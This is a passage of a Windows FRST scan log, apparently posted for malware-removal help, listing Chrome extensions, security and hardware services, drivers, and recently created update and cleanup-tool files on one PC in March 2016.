CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 MBAMScheduler; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160309.001\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-09] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek                                            )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 20:35 - 2016-03-09 20:35 - 00026260 _____ C:\Users\levilaing\Desktop\FRST.txt
2016-03-09 19:47 - 2016-03-09 19:47 - 00008389 _____ C:\Users\levilaing\Desktop\MBAM.txt
2016-03-09 18:32 - 2016-03-09 20:33 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 18:31 - 2016-03-09 18:31 - 00000910 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-09 18:31 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-09 18:28 - 2016-03-09 18:28 - 22908888 _____ (Malwarebytes ) C:\Users\levilaing\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-09 17:42 - 2016-03-09 17:42 - 01609216 _____ (Malwarebytes) C:\Users\levilaing\Downloads\JRT.exe
2016-03-09 17:27 - 2016-03-09 17:33 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-09 17:26 - 2016-03-09 17:26 - 01524224 _____ C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
2016-03-09 16:34 - 2016-02-24 03:51 - 07474528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-09 16:34 - 2016-02-24 03:28 - 03449168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-03-09 16:34 - 2016-02-24 02:46 - 06607080 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 02:11 - 01997152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-09 16:34 - 2016-02-24 02:06 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 00:43 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:40 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:39 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-09 16:34 - 2016-02-24 00:11 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-09 16:34 - 2016-02-24 00:09 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:07 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:01 - 01831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 02273792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 01098752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-03-09 16:34 - 2016-02-23 23:55 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:34 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:20 - 22376960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:18 - 18677760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 19339776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 05321728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:10 - 24600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:09 - 06972416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:05 - 12586496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-09 16:34 - 2016-02-23 23:03 - 14252544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-09 16:34 - 2016-02-23 22:59 - 05661696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-09 16:34 - 2016-02-23 22:55 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-09 16:33 - 2016-02-29 23:31 - 00848168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-09 16:33 - 2016-02-29 23:22 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-09 16:33 - 2016-02-24 03:52 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 03:48 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-09 16:33 - 2016-02-24 03:47 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-09 16:33 - 2016-02-24 03:40 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-09 16:33 - 2016-02-24 03:34 - 01613664 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-09 16:33 - 2016-02-24 03:15 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 02:58 - 00794888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:54 - 00127840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-03-09 16:33 - 2016-02-24 02:51 - 01322248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:50 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:43 - 00625000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00141560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-03-09 16:33 - 2016-02-24 02:19 - 00670928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:14 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00957608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:11 - 00652392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-09 16:33 - 2016-02-24 02:11 - 00258280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 02:10 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 02:10 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-09 16:33 - 2016-02-24 02:09 - 00640472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-09 16:33 - 2016-02-24 02:09 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:59 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 01:37 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 01:36 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00540752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 01:35 - 00523752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00220064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00538736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:31 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-03-09 16:33 - 2016-02-24 01:30 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 01:28 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:22 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-09 16:33 - 2016-02-24 01:15 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-09 16:33 - 2016-02-24 01:14 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 01:13 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 01:10 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 01:07 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-03-09 16:33 - 2016-02-24 01:05 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-03-09 16:33 - 2016-02-24 01:03 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-09 16:33 - 2016-02-24 01:02 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2016-03-09 16:33 - 2016-02-24 01:00 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-03-09 16:33 - 2016-02-24 00:58 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-09 16:33 - 2016-02-24 00:54 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 00:51 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-09 16:33 - 2016-02-24 00:49 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-03-09 16:33 - 2016-02-24 00:47 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-03-09 16:33 - 2016-02-24 00:46 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 01713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00700416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 00:43 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:39 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 00:38 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 00:36 - 01847808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:34 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-03-09 16:33 - 2016-02-24 00:34 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 00:25 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-09 16:33 - 2016-02-24 00:23 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 00:22 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:17 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:16 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-09 16:33 - 2016-02-24 00:13 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
